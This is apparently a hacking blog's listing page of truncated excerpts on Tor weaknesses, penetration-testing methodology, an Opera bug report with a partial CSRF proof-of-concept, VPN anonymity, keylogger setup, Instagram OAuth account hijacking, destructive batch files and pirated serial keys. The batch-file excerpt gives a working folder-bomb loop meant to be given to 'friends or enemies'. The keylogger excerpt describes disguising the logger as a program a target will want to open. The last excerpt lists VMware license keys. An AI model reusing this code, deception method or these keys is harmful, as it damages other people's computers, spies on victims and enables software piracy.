Using Tor are you sure you want to continue ? TOR - The Onion Router is definetely a great choice for hackers when it comes to surf the internet anonymously as it is totally free and helps you defend against revealing states of personal information and freedom. It protects you by bouncing off your Public Ip Address to the underlying distributed network of relays running by volunteer all around the world. It is undoubtedly the best program available for giving you anonymity but wait. Give it another thought. To your surprise, a malicious node is a weak link in the whole security chain of the TOR network. Lets get in more deeper with it and check out what TOR actually says itself. Well, TOR clearly explains everything about its anonymous services. Once going through it, it can easily be concluded...

This tutorial is meant for beginners. Anyhow, it might be useful for intermediate/experts too! I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration test in a black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner & on the way to my goal. However, this won't prevent from teaching others...

Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame. I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows: Stored XSS The "Username" input was not being sanitized properly, Which resulted in an execution of javascript. CSRF POC The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details. POC <html> <body> <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">...

Welcome anons to #Setup Here we will cover the basics you need to know in order to stay safe and get your software configured. VPN: A vpn hides your real ip and replaces it with the tunnel you are connecting through, this means that you are extremely hard to trace back - not impossible however. DO NOT use free VPN's, proxies or TOR. Free VPN's keep logs of users activity and would happily hand it over to any law enforcement agency. Some suggestions VPN providers that are trusted and don't keep logs. When selecting your VPN make sure you choose Openvpn and not pptp, unless you are using it strictly on your mobile device. Most mobile phones especially Android DO NOT support openvpn unless you are running a custom ROM. Commonly Used (swedish servers) 1. http://anonine.se/ 2. http://www.vpntunnel.se/...

How to set up a keyloggerFirst of all, heres what this method will require and what it will involve: - A Brain - Keylogger, we will be using one called SysLogger - Target - Making a fake program that the target will want to open - An email (preferably a Gmail) So, lets get started. Open it up. You will be given a message, just click ‘OK’. Following that the GUI Should Open Up.. Tick the following...

How I Hacked Instagram Accounts - Break Security How I Hacked Instagram AccountsHi guys,For this post, I’m going to show you what I found in Instagram OAuth, and how I was able to hack into Instagram accounts using the OAuth vulnerabilities on Instagram.com/facebook.com.There are basically two ways to take advantage of the Instagram OAuth in order to take control of those accounts.1.Hijack Instagram...

DEADLY PC TRICKS In this tutorial I'm going to explain some deadly batch file tricks and hacks that can completely destroy your Windows Registry, You have to re-format your computer to bring it back to normal. Batch files discuessed in this post can create a real havoc on your computer, they can completely irritate you so don't try them on your PC. Use them on your friends or enemies computer. 1. Folder Bomber This batch file will create 3000+ folder in less than a minute. Open your notepad and type the following codes. @echo off :top md %random% goto top Save it as 3000.bat Give this file to your friend and when he will click on that his nightmare will be started. Above Code Explained. @echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random...

50+ Serial Keys For Popular Software ╚═►VMware Workstation v9.X ◄═╝Serial Key:→↓ZF3X0-4ZW0Q-0842P-E6PGC-PKRZFVY19K-01X5L-084MY-MXMZG-MAUF2YA5X2-FEFDK-H80VQ-4YWQC-MPARDYU1WA-F1GD7-485UQ-ADNNT-XCAR6GF1WR-FGZ5J-485RY-JGQQC-XZ2G8AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2YG5EK-D1X8L-088XY-NNQEC-P3AW6VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6GC1WK-F8XEM-M812P-9WMG9-XUU9FAY540-00W0M-088DY-GDQ7T-QL8Z8FF34U-A5W11-H80UP-F6WNV-NL8V6CF71K-AGD52-H894Q-Q4P7E-XL2R6YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF========================================================================...

powered by Blogger | WordPress by Newwpthemes | Converted by BloggerTheme